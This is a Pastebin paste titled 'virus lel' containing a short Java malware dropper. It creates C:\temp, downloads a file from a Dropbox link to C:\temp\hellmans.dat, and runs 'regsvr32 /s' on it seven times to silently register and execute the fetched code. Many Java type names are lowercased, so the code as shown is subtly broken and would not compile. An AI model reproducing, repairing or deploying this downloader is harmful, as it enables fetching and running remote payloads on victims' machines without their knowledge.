Advertisement
kernel_memory_dump

virus lel

Mar 6th, 2014
195
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Java 1.10 KB | None | 0 0
  1. package com.cakes;
  2.  
  3. import java.io.*;
  4. import java.net.URL;
  5.  
  6. public class giatompoutso {
  7.     public giatompoutso() {
  8.     }
  9.  
  10.     public static void sikoseTo() throws ioexception {
  11.         for (int m = 1; m < 8; m++) {
  12.             string cmd[] = { "regsvr32", "/s", "C:\\temp\\hellmans.dat" };
  13.             runtime.getRuntime().exec(cmd);
  14.         }
  15.     }
  16.  
  17.     public static void main(string args[]) throws exception {
  18.         (new file("C:\\temp")).mkdir();
  19.         file u = new file("C:\\temp\\hellmans.dat");
  20.         if (u.exists()) {
  21.             sikoseTo();
  22.         } else {
  23.             string toSpitiTouPepe = "http://dl.dropboxusercontent.com/s/72sv69ygrgqazfn/module.dat?dl=1";
  24.             string oProorismosTouPepe = "C:\\temp\\hellmans.dat";
  25.             RixtoKato(toSpitiTouPepe, oProorismosTouPepe);
  26.         }
  27.     }
  28.  
  29.     public static void RixtoKato(string diefthynsi, string proorismos)
  30.             throws ioexception {
  31.         url url = new url(diefthynsi);
  32.         inputstream is = url.openStream();
  33.         outputstream os = new fileoutputstream(proorismos);
  34.         byte b[] = new byte[0x493e7];
  35.         int length;
  36.         while ((length = is.read(b)) != -1)
  37.             os.write(b, 0, length);
  38.         is.close();
  39.         os.close();
  40.         sikoseTo();
  41.     }
  42. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement